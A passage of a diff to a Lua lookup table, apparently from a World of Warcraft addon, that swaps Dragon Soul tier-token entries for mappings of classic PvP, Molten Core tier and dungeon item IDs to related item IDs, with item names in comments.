- 78855, -- Gauntlets of the Corrupted Vanquisher + -- Legionnaire's Chain Hauberk + ["227071"] = { + 22874, -- Legionnaire's Chain Hauberk }, - -- Deep Earth Handwraps - ["78680"] = { - 78855, -- Gauntlets of the Corrupted Vanquisher + -- Knight-Captain's Chain Legguards + ["227072"] = { + 23293, -- Knight-Captain's Chain Legguards }, - -- Gloves of the Faceless Shroud - ["78681"] = { - 78853, -- Gauntlets of the Corrupted Conqueror + -- Legionnaire's Chain Legguards + ["227073"] = { + 22875, -- Legionnaire's Chain Legguards }, - -- Gloves of Dying Light - ["78682"] = { - 78853, -- Gauntlets of the Corrupted Conqueror + -- Blood Guard's Chain Greaves + ["227074"] = { + 22843, -- Blood Guard's Chain Greaves }, - -- Handwraps of Dying Light - ["78683"] = { - 78853, -- Gauntlets of the Corrupted Conqueror + -- Blood Guard's Chain Vices + ["227075"] = { + 22862, -- Blood Guard's Chain Vices }, - -- Deep Earth Grips - ["78684"] = { - 78855, -- Gauntlets of the Corrupted Vanquisher + -- Knight-Lieutenant's Chain Greaves + ["227076"] = { + 23278, -- Knight-Lieutenant's Chain Greaves }, - -- Spiritwalker's Headpiece - ["78685"] = { - 78851, -- Crown of the Corrupted Protector + -- Knight-Lieutenant's Chain Vices + ["227077"] = { + 23279, -- Knight-Lieutenant's Chain Vices }, - -- Spiritwalker's Helmet - ["78686"] = { - 78851, -- Crown of the Corrupted Protector + -- Champion's Chain Pauldrons + ["227078"] = { + 16528, -- Champion's Chain Pauldrons }, - -- Necrotic Boneplate Helmet - ["78687"] = { - 78852, -- Crown of the Corrupted Vanquisher + -- Lieutenant Commander's Chain Pauldrons + ["227084"] = { + 16427, -- Lieutenant Commander's Chain Pauldrons }, - -- Colossal Dragonplate Helmet - ["78688"] = { - 78851, -- Crown of the Corrupted Protector + -- Champion's Dreadweave Cowl + ["227090"] = { + 23255, -- Champion's Dreadweave Cowl }, - -- Colossal Dragonplate Faceguard - ["78689"] = { - 78851, -- Crown of the Corrupted Protector + -- Lieutenant Commander's Dreadweave Spaulders + ["227091"] = { + 23311, -- Lieutenant Commander's Dreadweave Spaulders }, - -- Deep Earth Helm - ["78690"] = { - 78852, -- Crown of the Corrupted Vanquisher + -- Champion's Dreadweave Spaulders + ["227092"] = { + 23256, -- Champion's Dreadweave Spaulders }, - -- Spiritwalker's Faceguard - ["78691"] = { - 78851, -- Crown of the Corrupted Protector + -- Lieutenant Commander's Dreadweave Cowl + ["227093"] = { + 23310, -- Lieutenant Commander's Dreadweave Cowl }, - -- Headguard of Radiant Glory - ["78692"] = { - 78850, -- Crown of the Corrupted Conqueror + -- Legionnaire's Dreadweave Tunic + ["227094"] = { + 22884, -- Legionnaire's Dreadweave Tunic }, - -- Helmet of Radiant Glory - ["78693"] = { - 78850, -- Crown of the Corrupted Conqueror + -- Knight-Captain's Dreadweave Legguards + ["227095"] = { + 23296, -- Knight-Captain's Dreadweave Legguards }, - -- Deep Earth Headpiece - ["78694"] = { - 78852, -- Crown of the Corrupted Vanquisher + -- Knight-Captain's Dreadweave Tunic + ["227096"] = { + 23297, -- Knight-Captain's Dreadweave Tunic }, - -- Faceguard of Radiant Glory - ["78695"] = { - 78850, -- Crown of the Corrupted Conqueror + -- Legionnaire's Dreadweave Legguards + ["227097"] = { + 22881, -- Legionnaire's Dreadweave Legguards }, - -- Deep Earth Cover - ["78696"] = { - 78852, -- Crown of the Corrupted Vanquisher + -- Blood Guard's Dreadweave Walkers + ["227098"] = { + 22855, -- Blood Guard's Dreadweave Walkers }, - -- Necrotic Boneplate Faceguard - ["78697"] = { - 78852, -- Crown of the Corrupted Vanquisher + -- Blood Guard's Dreadweave Handwraps + ["227099"] = { + 22865, -- Blood Guard's Dreadweave Handwraps }, - -- Wyrmstalker's Headguard - ["78698"] = { - 78851, -- Crown of the Corrupted Protector + -- Knight-Lieutenant's Dreadweave Handwraps + ["227100"] = { + 23282, -- Knight-Lieutenant's Dreadweave Handwraps }, - -- Blackfang Battleweave Helmet - ["78699"] = { - 78852, -- Crown of the Corrupted Vanquisher + -- Knight-Lieutenant's Dreadweave Walkers + ["227101"] = { + 23283, -- Knight-Lieutenant's Dreadweave Walkers }, - -- Cowl of Dying Light - ["78700"] = { - 78850, -- Crown of the Corrupted Conqueror + -- Lieutenant Commander's Silk Mantle + ["227102"] = { + 23319, -- Lieutenant Commander's Silk Mantle }, - -- Time Lord's Hood - ["78701"] = { - 78852, -- Crown of the Corrupted Vanquisher + -- Lieutenant Commander's Silk Cowl + ["227103"] = { + 23318, -- Lieutenant Commander's Silk Cowl }, - -- Hood of the Faceless Shroud - ["78702"] = { - 78850, -- Crown of the Corrupted Conqueror + -- Champion's Silk Mantle + ["227104"] = { + 23264, -- Champion's Silk Mantle + }, + -- Champion's Silk Cowl + ["227105"] = { + 23263, -- Champion's Silk Cowl }, - -- Hood of Dying Light - ["78703"] = { - 78850, -- Crown of the Corrupted Conqueror + -- Legionnaire's Silk Tunic + ["227106"] = { + 22886, -- Legionnaire's Silk Tunic }, - -- Spiritwalker's Legguards - ["78704"] = { - 78857, -- Leggings of the Corrupted Protector + -- Legionnaire's Silk Legguards + ["227107"] = { + 22883, -- Legionnaire's Silk Legguards }, - -- Colossal Dragonplate Legguards - ["78705"] = { - 78857, -- Leggings of the Corrupted Protector + -- Knight-Captain's Silk Tunic + ["227108"] = { + 23305, -- Knight-Captain's Silk Tunic }, - -- Colossal Dragonplate Legplates - ["78706"] = { - 78857, -- Leggings of the Corrupted Protector + -- Knight-Captain's Silk Legguards + ["227109"] = { + 23304, -- Knight-Captain's Silk Legguards + }, + -- Blood Guard's Silk Walkers + ["227110"] = { + 22860, -- Blood Guard's Silk Walkers + }, + -- Blood Guard's Silk Handwraps + ["227111"] = { + 22870, -- Blood Guard's Silk Handwraps + }, + -- Knight-Lieutenant's Silk Walkers + ["227112"] = { + 23291, -- Knight-Lieutenant's Silk Walkers + }, + -- Knight-Lieutenant's Silk Handwraps + ["227113"] = { + 23290, -- Knight-Lieutenant's Silk Handwraps + }, + -- Knight-Lieutenant's Silk Gloves + ["227116"] = { + 16391, -- Knight-Lieutenant's Silk Gloves + }, + -- Blood Guard's Silk Gloves + ["227117"] = { + 16487, -- Blood Guard's Silk Gloves + }, + -- Champion's Satin Hood + ["227118"] = { + 23261, -- Champion's Satin Hood + }, + -- Lieutenant Commander's Satin Mantle + ["227119"] = { + 23317, -- Lieutenant Commander's Satin Mantle + }, + -- Champion's Satin Mantle + ["227120"] = { + 23262, -- Champion's Satin Mantle + }, + -- Lieutenant Commander's Satin Hood + ["227121"] = { + 23316, -- Lieutenant Commander's Satin Hood + }, + -- Knight-Captain's Satin Tunic + ["227122"] = { + 23303, -- Knight-Captain's Satin Tunic + }, + -- Legionnaire's Satin Legguards + ["227123"] = { + 22882, -- Legionnaire's Satin Legguards + }, + -- Legionnaire's Satin Tunic + ["227124"] = { + 22885, -- Legionnaire's Satin Tunic + }, + -- Knight-Captain's Satin Legguards + ["227125"] = { + 23302, -- Knight-Captain's Satin Legguards + }, + -- Blood Guard's Satin Handwraps + ["227126"] = { + 22869, -- Blood Guard's Satin Handwraps + }, + -- Blood Guard's Satin Walkers + ["227127"] = { + 22859, -- Blood Guard's Satin Walkers + }, + -- Knight-Lieutenant's Satin Handwraps + ["227128"] = { + 23288, -- Knight-Lieutenant's Satin Handwraps + }, + -- Knight-Lieutenant's Satin Walkers + ["227129"] = { + 23289, -- Knight-Lieutenant's Satin Walkers + }, + -- Knight-Captain's Satin Leggings + ["227137"] = { + 17599, -- Knight-Captain's Satin Leggings + }, + -- Knight-Captain's Lamellar Breastplate + ["227142"] = { + 16433, -- Knight-Captain's Lamellar Breastplate + 23272, -- Knight-Captain's Lamellar Breastplate + }, + -- Knight-Captain's Lamellar Leggings + ["227143"] = { + 16435, -- Knight-Captain's Lamellar Leggings + 23273, -- Knight-Captain's Lamellar Leggings + }, + -- Lieutenant Commander's Lamellar Headguard + ["227144"] = { + 16434, -- Lieutenant Commander's Lamellar Headguard + 23276, -- Lieutenant Commander's Lamellar Headguard + }, + -- Lieutenant Commander's Lamellar Shoulders + ["227145"] = { + 16436, -- Lieutenant Commander's Lamellar Shoulders + 23277, -- Lieutenant Commander's Lamellar Shoulders + }, + -- Knight-Lieutenant's Lamellar Sabatons + ["227146"] = { + 16409, -- Knight-Lieutenant's Lamellar Sabatons + 23275, -- Knight-Lieutenant's Lamellar Sabatons + }, + -- Knight-Lieutenant's Lamellar Gauntlets + ["227147"] = { + 16410, -- Knight-Lieutenant's Lamellar Gauntlets + 23274, -- Knight-Lieutenant's Lamellar Gauntlets + }, + -- Champion's Mail Pauldrons + ["227154"] = { + 23260, -- Champion's Mail Pauldrons + }, + -- Champion's Mail Headguard + ["227155"] = { + 23259, -- Champion's Mail Headguard + }, + -- Legionnaire's Mail Legguards + ["227156"] = { + 22887, -- Legionnaire's Mail Legguards + }, + -- Legionnaire's Mail Hauberk + ["227157"] = { + 22876, -- Legionnaire's Mail Hauberk + }, + -- Blood Guard's Mail Greaves + ["227158"] = { + 22857, -- Blood Guard's Mail Greaves + }, + -- Blood Guard's Mail Vices + ["227159"] = { + 22867, -- Blood Guard's Mail Vices + }, + -- Legionnaire's Mail Leggings + ["227161"] = { + 16523, -- Legionnaire's Mail Leggings + }, + -- Champion's Mail Helm + ["227162"] = { + 16521, -- Champion's Mail Helm + }, + -- Lieutenant Commander's Dragonhide Shoulders + ["227172"] = { + 23309, -- Lieutenant Commander's Dragonhide Shoulders + }, + -- Lieutenant Commander's Dragonhide Headguard + ["227173"] = { + 23308, -- Lieutenant Commander's Dragonhide Headguard + }, + -- Champion's Dragonhide Headguard + ["227174"] = { + 23253, -- Champion's Dragonhide Headguard + }, + -- Champion's Dragonhide Shoulders + ["227175"] = { + 23254, -- Champion's Dragonhide Shoulders + }, + -- Knight-Captain's Dragonhide Chestpiece + ["227176"] = { + 23294, -- Knight-Captain's Dragonhide Chestpiece + }, + -- Legionnaire's Dragonhide Leggings + ["227177"] = { + 22878, -- Legionnaire's Dragonhide Leggings + }, + -- Knight-Captain's Dragonhide Leggings + ["227178"] = { + 16422, -- Knight-Captain's Dragonhide Leggings + 23295, -- Knight-Captain's Dragonhide Leggings + }, + -- Legionnaire's Dragonhide Chestpiece + ["227179"] = { + 22877, -- Legionnaire's Dragonhide Chestpiece + }, + -- Blood Guard's Dragonhide Grips + ["227180"] = { + 22863, -- Blood Guard's Dragonhide Grips + }, + -- Blood Guard's Dragonhide Treads + ["227181"] = { + 22852, -- Blood Guard's Dragonhide Treads + }, + -- Knight-Lieutenant's Dragonhide Treads + ["227182"] = { + 23281, -- Knight-Lieutenant's Dragonhide Treads + }, + -- Knight-Lieutenant's Dragonhide Grips + ["227183"] = { + 23280, -- Knight-Lieutenant's Dragonhide Grips + }, + -- Champion's Dragonhide Spaulders + ["227184"] = { + 16501, -- Champion's Dragonhide Spaulders + }, + -- Champion's Dragonhide Helm + ["227186"] = { + 16503, -- Champion's Dragonhide Helm + }, + -- Blood Guard's Dragonhide Boots + ["227188"] = { + 16494, -- Blood Guard's Dragonhide Boots + }, + -- Knight-Lieutenant's Dragonhide Gloves + ["227193"] = { + 16397, -- Knight-Lieutenant's Dragonhide Gloves + }, + -- Knight-Captain's Dragonhide Tunic + ["227196"] = { + 16421, -- Knight-Captain's Dragonhide Tunic + }, + -- Blood Guard's Dragonhide Gauntlets + ["227204"] = { + 16496, -- Blood Guard's Dragonhide Gauntlets + }, + -- Tidal Loop + ["227454"] = { + 18398, -- Tidal Loop + }, + -- Ocean's Breeze + ["227455"] = { + 18399, -- Ocean's Breeze + }, + -- Incandescent Belt + ["227530"] = { + 226551, -- Felheart Belt + 226555, -- Arcanist Belt + 226570, -- Arcanist Cord + 226577, -- Girdle of Prophecy + 226580, -- Belt of Prophecy + }, + -- Incandescent Bindings + ["227531"] = { + 226553, -- Felheart Bracers + 226558, -- Arcanist Bindings + 226567, -- Arcanist Wristwraps + 226578, -- Vambraces of Prophecy + 226579, -- Wristwraps of Prophecy + }, + -- Incandescent Hood + ["227532"] = { + 226549, -- Felheart Horns + 226562, -- Arcanist Crown + 226564, -- Arcanist Headdress + 226573, -- Circlet of Prophecy + 226584, -- Crown of Prophecy + }, + -- Incandescent Gloves + ["227533"] = { + 226552, -- Felheart Gloves + 226556, -- Arcanist Gloves + 226569, -- Arcanist Handguards + 226572, -- Gloves of Prophecy + 226585, -- Hands of Prophecy + }, + -- Incandescent Leggings + ["227534"] = { + 226547, -- Felheart Pants + 226561, -- Arcanist Leggings + 226565, -- Arcanist Pants + 226574, -- Pants of Prophecy + 226583, -- Leggings of Prophecy + }, + -- Incandescent Robe + ["227535"] = { + 226548, -- Felheart Robes + 226559, -- Arcanist Robes + 226563, -- Arcanist Garments + 226575, -- Robes of Prophecy + 226582, -- Garments of Prophecy + }, + -- Incandescent Boots + ["227536"] = { + 226554, -- Felheart Slippers + 226557, -- Arcanist Boots + 226568, -- Arcanist Sandals + 226571, -- Boots of Prophecy + 226586, -- Sandals of Prophecy + }, + -- Incandescent Shoulderpads + ["227537"] = { + 226550, -- Felheart Shoulder Pads + 226560, -- Arcanist Mantle + 226566, -- Arcanist Shoulders + 226576, -- Mantle of Prophecy + 226581, -- Shoulderpads of Prophecy + }, + -- Sulfuras, Hand of Ragnaros + ["227683"] = { + 17182, -- Sulfuras, Hand of Ragnaros + }, + -- Sulfuron Hammer + ["227684"] = { + 17193, -- Sulfuron Hammer + }, + -- Blade of Hanna + ["227691"] = { + 2801, -- Blade of Hanna + }, + -- Plans: Sulfuron Hammer + ["227727"] = { + 18592, -- Plans: Sulfuron Hammer + }, + -- Eye of Sulfuras + ["227728"] = { + 17204, -- Eye of Sulfuras + 227683, -- Sulfuras, Hand of Ragnaros + }, + -- Thorium Brotherhood Contract + ["227730"] = { + 18628, -- Thorium Brotherhood Contract + }, + -- Molten Scaled Bindings + ["227750"] = { + 226530, -- Giantstalker's Bracers + 226541, -- Giantstalker's Wristguards + 226589, -- Lawbringer Bracers + 226596, -- Lawbringer Warbands + 226603, -- Lawbringer Vambraces + 226618, -- Earthfury Bracers + 226626, -- Earthfury Wristbands + 226634, -- Earthfury Wristguards + 226642, -- Earthfury Bindings + }, + -- Molten Scaled Belt + ["227751"] = { + 226529, -- Giantstalker's Belt + 226542, -- Giantstalker's Girdle + 226592, -- Lawbringer Belt + 226597, -- Lawbringer Girdle + 226604, -- Lawbringer Battlebelt + 226616, -- Earthfury Belt + 226625, -- Earthfury Cord + 226633, -- Earthfury Waistguard + 226641, -- Earthfury Girdle + }, + -- Molten Scaled Shoulderpads + ["227752"] = { + 221783, -- Lawbringer Shoulderplates + 226527, -- Giantstalker's Epaulets + 226543, -- Giantstalker's Spauldrons + 226588, -- Lawbringer Spaulders + 226605, -- Lawbringer Pauldrons + 226611, -- Earthfury Epaulets + 226624, -- Earthfury Mantle + 226632, -- Earthfury Pauldrons + 226640, -- Earthfury Spaulders + }, + -- Molten Scaled Leggings + ["227754"] = { + 226532, -- Giantstalker's Leggings + 226537, -- Giantstalker's Chain Leggings + 226594, -- Lawbringer Legplates + 226598, -- Lawbringer Leggings + 226606, -- Lawbringer Legguards + 226614, -- Earthfury Legguards + 226623, -- Earthfury Leggings + 226631, -- Earthfury Scaled Leggings + 226639, -- Earthfury Chain Leggings + }, + -- Molten Scaled Helm + ["227755"] = { + 226533, -- Giantstalker's Helmet + 226536, -- Giantstalker's Guise + 226590, -- Lawbringer Helm + 226599, -- Lawbringer Crown + 226607, -- Lawbringer Headguard + 226612, -- Earthfury Helmet + 226622, -- Earthfury Visor + 226630, -- Earthfury Greathelm + 226638, -- Earthfury Headpiece + }, + -- Molten Scaled Gloves + ["227756"] = { + 226528, -- Giantstalker's Gloves + 226540, -- Giantstalker's Handguards + 226591, -- Lawbringer Gauntlets + 226600, -- Lawbringer Grips + 226608, -- Lawbringer Handguards + 226615, -- Earthfury Gauntlets + 226621, -- Earthfury Hands + 226629, -- Earthfury Handguards + 226637, -- Earthfury Grips + }, + -- Molten Scaled Boots + ["227757"] = { + 226531, -- Giantstalker's Boots + 226538, -- Giantstalker's Sabatons + 226593, -- Lawbringer Boots + 226601, -- Lawbringer Battleboots + 226609, -- Lawbringer Sabatons + 226613, -- Earthfury Boots + 226620, -- Earthfury Walkers + 226628, -- Earthfury Sabatons + 226636, -- Earthfury Battleboots + }, + -- Molten Scaled Chest + ["227758"] = { + 226534, -- Giantstalker's Breastplate + 226535, -- Giantstalker's Chainmail + 226595, -- Lawbringer Chestguard + 226602, -- Lawbringer Breastplate + 226610, -- Lawbringer Chestplate + 226617, -- Earthfury Vestments + 226619, -- Earthfury Ringmail + 226627, -- Earthfury Scalemail + 226635, -- Earthfury Chainmail + }, + -- Scorched Core Gloves + ["227759"] = { + 226441, -- Nightslayer Gloves + 226475, -- Nightslayer Handguards + 226486, -- Gauntlets of Might + 226497, -- Hands of Might + 226648, -- Cenarion Gloves + 226654, -- Cenarion Gauntlets + 226664, -- Cenarion Fists + 226669, -- Cenarion Grips + }, + -- Scorched Core Bindings + ["227760"] = { + 226442, -- Nightslayer Bracelets + 226476, -- Nightslayer Bracers + 226484, -- Bracers of Might + 226499, -- Armguards of Might + 226649, -- Cenarion Bracers + 226655, -- Cenarion Wrists + 226662, -- Cenarion Bands + 226668, -- Cenarion Wristguards + }, + -- Scorched Core Belt + ["227761"] = { + 226440, -- Nightslayer Belt + 226474, -- Nightslayer Waistguard + 226485, -- Belt of Might + 226498, -- Sash of Might + 226650, -- Cenarion Belt + 226657, -- Cenarion Cord + 226660, -- Cenarion Girdle + 226667, -- Cenarion Waistguard + }, + -- Scorched Core Shoulderpads + ["227762"] = { + 226444, -- Nightslayer Shoulder Pads + 226478, -- Nightslayer Pauldrons + 226491, -- Shoulderplates of Might + 226492, -- Pauldrons of Might + 226644, -- Cenarion Spaulders + 226653, -- Cenarion Mantle + 226665, -- Cenarion Shoulders + 226674, -- Cenarion Pauldrons + }, + -- Scorched Core Leggings + ["227763"] = { + 226445, -- Nightslayer Pants + 226479, -- Nightslayer Legguards + 226490, -- Legplates of Might + 226493, -- Leggings of Might + 226646, -- Cenarion Leggings + 226651, -- Cenarion Pants + 226666, -- Cenarion Trousers + 226671, -- Cenarion Legguards + }, + -- Scorched Core Helm + ["227764"] = { + 226446, -- Nightslayer Cover + 226480, -- Nightslayer Hood + 226488, -- Helm of Might + 226495, -- Jaws of Might + 226647, -- Cenarion Helm + 226658, -- Cenarion Antlers + 226659, -- Cenarion Horns + 226670, -- Cenarion Crown + }, + -- Scorched Core Boots + ["227765"] = { + 226443, -- Nightslayer Boots + 226477, -- Nightslayer Tabi + 226487, -- Sabatons of Might + 226496, -- Treads of Might + 226645, -- Cenarion Boots + 226652, -- Cenarion Sandals + 226663, -- Cenarion Treads + 226673, -- Cenarion Walkers + }, + -- Scorched Core Chest + ["227766"] = { + 221785, -- Cenarion Vestments + 226447, -- Nightslayer Chestpiece + 226473, -- Nightslayer Cuirass + 226489, -- Breastplate of Might + 226494, -- Hauberk of Might + 226656, -- Cenarion Embrace + 226661, -- Cenarion Tunic + 226675, -- Cenarion Armor + }, + -- Wisdom of the Timbermaw + ["227806"] = { + 19047, -- Wisdom of the Timbermaw + }, + -- Defender of the Timbermaw + ["227811"] = { + 21326, -- Defender of the Timbermaw + }, + -- Furbolg Medicine Pouch + ["227812"] = { + 16768, -- Furbolg Medicine Pouch + }, + -- Pattern: Golden Mantle of the Dawn + ["227895"] = { + 19329, -- Pattern: Golden Mantle of the Dawn + }, + -- Pattern: Argent Boots + ["227896"] = { + 19216, -- Pattern: Argent Boots + }, + -- Pattern: Argent Shoulders + ["227897"] = { + 19217, -- Pattern: Argent Shoulders + }, + -- Head of Rend Blackhand + ["227911"] = { + 12630, -- Head of Rend Blackhand + }, + -- Flame Wrath + ["227934"] = { + 11809, -- Flame Wrath + }, + -- Lord General's Sword + ["227940"] = { + 11817, -- Lord General's Sword + }, + -- Wraith Scythe + ["227941"] = { + 11920, -- Wraith Scythe + }, + -- Serpentine Skuller + ["227942"] = { + 12605, -- Serpentine Skuller + }, + -- Verek's Collar + ["227943"] = { + 11755, -- Verek's Collar + }, + -- Verek's Leash + ["227944"] = { + 22242, -- Verek's Leash + }, + -- Soot Encrusted Footwear + ["227945"] = { + 22245, -- Soot Encrusted Footwear + }, + -- Rubidium Hammer + ["227946"] = { + 11805, -- Rubidium Hammer + }, + -- Golem Fitted Pauldrons + ["227947"] = { + 22212, -- Golem Fitted Pauldrons + }, + -- Angerforge's Battle Axe + ["227948"] = { + 11816, -- Angerforge's Battle Axe + }, + -- Force of Magma + ["227949"] = { + 11803, -- Force of Magma + }, + -- Stone of the Earth + ["227950"] = { + 11786, -- Stone of the Earth + }, + -- Bloodfist + ["227951"] = { + 11744, -- Bloodfist + }, + -- Savage Gladiator Chain + ["227952"] = { + 11726, -- Savage Gladiator Chain + }, + -- The Hammer of Grace + ["227953"] = { + 11923, -- The Hammer of Grace + }, + -- Boreal Mantle + ["227954"] = { + 11782, -- Boreal Mantle + }, + -- Savage Gladiator Helm + ["227955"] = { + 11729, -- Savage Gladiator Helm }, - -- Necrotic Boneplate Greaves - ["78707"] = { - 78858, -- Leggings of the Corrupted Vanquisher + -- Deathdealer Breastplate + ["227956"] = { + 11926, -- Deathdealer Breastplate }, - -- Blackfang Battleweave Legguards - ["78708"] = { - 78858, -- Leggings of the Corrupted Vanquisher + -- Savage Gladiator Greaves + ["227957"] = { + 11731, -- Savage Gladiator Greaves }, - -- Wyrmstalker's Legguards - ["78709"] = { - 78857, -- Leggings of the Corrupted Protector + -- Ghostshroud + ["227958"] = { + 11925, -- Ghostshroud }, - -- Deep Earth Legwraps - ["78710"] = { - 78858, -- Leggings of the Corrupted Vanquisher + -- Legplates of the Eternal Guardian + ["227959"] = { + 11927, -- Legplates of the Eternal Guardian + }, + -- Impervious Giant + ["227960"] = { + 11921, -- Impervious Giant + }, + -- Savage Gladiator Grips + ["227961"] = { + 11730, -- Savage Gladiator Grips + }, + -- Flarethorn + ["227962"] = { + 22266, -- Flarethorn + }, + -- Blood-etched Blade + ["227963"] = { + 11922, -- Blood-etched Blade + }, + -- Luminary Kilt + ["227964"] = { + 11823, -- Luminary Kilt }, - -- Spiritwalker's Kilt - ["78711"] = { - 78857, -- Leggings of the Corrupted Protector + -- Omnicast Boots + ["227965"] = { + 11822, -- Omnicast Boots }, - -- Legplates of Radiant Glory - ["78712"] = { - 78856, -- Leggings of the Corrupted Conqueror + -- Naglering + ["227966"] = { + 11669, -- Naglering }, - -- Deep Earth Legguards - ["78713"] = { - 78858, -- Leggings of the Corrupted Vanquisher + -- Second Wind + ["227967"] = { + 11819, -- Second Wind }, - -- Deep Earth Leggings - ["78714"] = { - 78858, -- Leggings of the Corrupted Vanquisher + -- Rockfist + ["227968"] = { + 11743, -- Rockfist }, - -- Legguards of Radiant Glory - ["78715"] = { - 78856, -- Leggings of the Corrupted Conqueror + -- Chief Architect's Monocle + ["227969"] = { + 11839, -- Chief Architect's Monocle }, - -- Necrotic Boneplate Legguards - ["78716"] = { - 78858, -- Leggings of the Corrupted Vanquisher + -- Cape of the Fire Salamander + ["227970"] = { + 11812, -- Cape of the Fire Salamander }, - -- Greaves of Radiant Glory - ["78717"] = { - 78856, -- Leggings of the Corrupted Conqueror + -- Molten Fists + ["227971"] = { + 11814, -- Molten Fists }, - -- Spiritwalker's Legwraps - ["78718"] = { - 78857, -- Leggings of the Corrupted Protector + -- Burst of Knowledge + ["227972"] = { + 11832, -- Burst of Knowledge }, - -- Legwraps of Dying Light - ["78719"] = { - 78856, -- Leggings of the Corrupted Conqueror + -- Circle of Flame + ["227973"] = { + 11808, -- Circle of Flame }, - -- Time Lord's Leggings - ["78720"] = { - 78858, -- Leggings of the Corrupted Vanquisher + -- Lavastone Hammer + ["227974"] = { + 22208, -- Lavastone Hammer }, - -- Leggings of the Faceless Shroud - ["78721"] = { - 78856, -- Leggings of the Corrupted Conqueror + -- Golem Skull Helm + ["227975"] = { + 11746, -- Golem Skull Helm }, - -- Leggings of Dying Light - ["78722"] = { - 78856, -- Leggings of the Corrupted Conqueror + -- Libram of Truth + ["227976"] = { + 22400, -- Libram of Truth }, - -- Spiritwalker's Hauberk - ["78723"] = { - 78848, -- Chest of the Corrupted Protector + -- Totem of Rage + ["227977"] = { + 22395, -- Totem of Rage }, - -- Spiritwalker's Cuirass - ["78724"] = { - 78848, -- Chest of the Corrupted Protector + -- Magmus Stone + ["227978"] = { + 11935, -- Magmus Stone }, - -- Spiritwalker's Tunic - ["78725"] = { - 78848, -- Chest of the Corrupted Protector + -- Hands of the Exalted Herald + ["227979"] = { + 12554, -- Hands of the Exalted Herald }, - -- Breastplate of Radiant Glory - ["78726"] = { - 78847, -- Chest of the Corrupted Conqueror + -- Robes of the Royal Crown + ["227980"] = { + 11924, -- Robes of the Royal Crown }, - -- Battleplate of Radiant Glory - ["78727"] = { - 78847, -- Chest of the Corrupted Conqueror + -- Dreadforge Retaliator + ["227981"] = { + 11931, -- Dreadforge Retaliator }, - -- Robes of Dying Light - ["78728"] = { - 78847, -- Chest of the Corrupted Conqueror + -- Guiding Stave of Wisdom + ["227982"] = { + 11932, -- Guiding Stave of Wisdom }, - -- Time Lord's Robes - ["78729"] = { - 78849, -- Chest of the Corrupted Vanquisher + -- Thaurissan's Royal Scepter + ["227984"] = { + 11928, -- Thaurissan's Royal Scepter }, - -- Robes of the Faceless Shroud - ["78730"] = { - 78847, -- Chest of the Corrupted Conqueror + -- The Emperor's New Cape + ["227985"] = { + 11930, -- The Emperor's New Cape }, - -- Robes of Dying Light - ["78731"] = { - 78847, -- Chest of the Corrupted Conqueror + -- Wristguards of Renown + ["227986"] = { + 22204, -- Wristguards of Renown }, - -- Chestguard of Radiant Glory - ["78732"] = { - 78847, -- Chest of the Corrupted Conqueror + -- Sash of the Grand Hunt + ["227987"] = { + 22207, -- Sash of the Grand Hunt }, - -- Spiritwalker's Spaulders - ["78733"] = { - 78860, -- Shoulders of the Corrupted Protector + -- Imperial Jewel + ["227988"] = { + 11933, -- Imperial Jewel }, - -- Colossal Dragonplate Shoulderguards - ["78734"] = { - 78860, -- Shoulders of the Corrupted Protector + -- Ironfoe + ["227991"] = { + 11684, -- Ironfoe }, - -- Colossal Dragonplate Pauldrons - ["78735"] = { - 78860, -- Shoulders of the Corrupted Protector + -- Death Knight Sabatons + ["227992"] = { + 18692, -- Death Knight Sabatons }, - -- Necrotic Boneplate Pauldrons - ["78736"] = { - 78861, -- Shoulders of the Corrupted Vanquisher + -- Ebon Hilt of Marduk + ["227993"] = { + 14576, -- Ebon Hilt of Marduk }, - -- Wyrmstalker's Spaulders - ["78737"] = { - 78860, -- Shoulders of the Corrupted Protector + -- Frightskull Shaft + ["227994"] = { + 14531, -- Frightskull Shaft }, - -- Blackfang Battleweave Spaulders - ["78738"] = { - 78861, -- Shoulders of the Corrupted Vanquisher + -- Cadaverous Armor + ["227995"] = { + 14637, -- Cadaverous Armor }, - -- Spiritwalker's Mantle - ["78739"] = { - 78860, -- Shoulders of the Corrupted Protector + -- Ancient Bone Bow + ["227996"] = { + 18680, -- Ancient Bone Bow }, - -- Deep Earth Mantle - ["78740"] = { - 78861, -- Shoulders of the Corrupted Vanquisher + -- Barovian Family Sword + ["227997"] = { + 14541, -- Barovian Family Sword }, - -- Spiritwalker's Shoulderwraps - ["78741"] = { - 78860, -- Shoulders of the Corrupted Protector + -- Bloodmail Boots + ["227998"] = { + 14616, -- Bloodmail Boots }, - -- Pauldrons of Radiant Glory - ["78742"] = { - 78859, -- Shoulders of the Corrupted Conqueror + -- Deathbone Sabatons + ["227999"] = { + 14621, -- Deathbone Sabatons }, - -- Deep Earth Spaulders - ["78743"] = { - 78861, -- Shoulders of the Corrupted Vanquisher + -- Deathbone Chestplate + ["228000"] = { + 14624, -- Deathbone Chestplate }, - -- Deep Earth Shoulderwraps - ["78744"] = { - 78861, -- Shoulders of the Corrupted Vanquisher + -- Stoneform Shoulders + ["228001"] = { + 13955, -- Stoneform Shoulders }, - -- Shoulderguards of Radiant Glory - ["78745"] = { - 78859, -- Shoulders of the Corrupted Conqueror + -- Deathbone Girdle + ["228002"] = { + 14620, -- Deathbone Girdle }, - -- Mantle of Radiant Glory - ["78746"] = { - 78859, -- Shoulders of the Corrupted Conqueror + -- Bloodmail Legguards + ["228003"] = { + 14612, -- Bloodmail Legguards }, - -- Mantle of Dying Light - ["78747"] = { - 78859, -- Shoulders of the Corrupted Conqueror + -- Windreaver Greaves + ["228004"] = { + 13967, -- Windreaver Greaves }, - -- Time Lord's Mantle - ["78748"] = { - 78861, -- Shoulders of the Corrupted Vanquisher + -- Clutch of Andros + ["228005"] = { + 13956, -- Clutch of Andros }, - -- Mantle of the Faceless Shroud - ["78749"] = { - 78859, -- Shoulders of the Corrupted Conqueror + -- Deathbone Gauntlets + ["228006"] = { + 14622, -- Deathbone Gauntlets }, - -- Mantle of Dying Light - ["78750"] = { - 78859, -- Shoulders of the Corrupted Conqueror + -- Gargoyle Slashers + ["228007"] = { + 13957, -- Gargoyle Slashers }, - -- Necrotic Boneplate Shoulderguards - ["78751"] = { - 78861, -- Shoulders of the Corrupted Vanquisher + -- Deathbone Legguards + ["228008"] = { + 14623, -- Deathbone Legguards }, - -- Colossal Dragonplate Battleplate - ["78752"] = { - 78864, -- Chest of the Corrupted Protector + -- Necropile Boots + ["228009"] = { + 14631, -- Necropile Boots }, - -- Colossal Dragonplate Chestguard - ["78753"] = { - 78864, -- Chest of the Corrupted Protector + -- Necropile Mantle + ["228010"] = { + 14633, -- Necropile Mantle }, - -- Necrotic Boneplate Breastplate - ["78754"] = { - 78862, -- 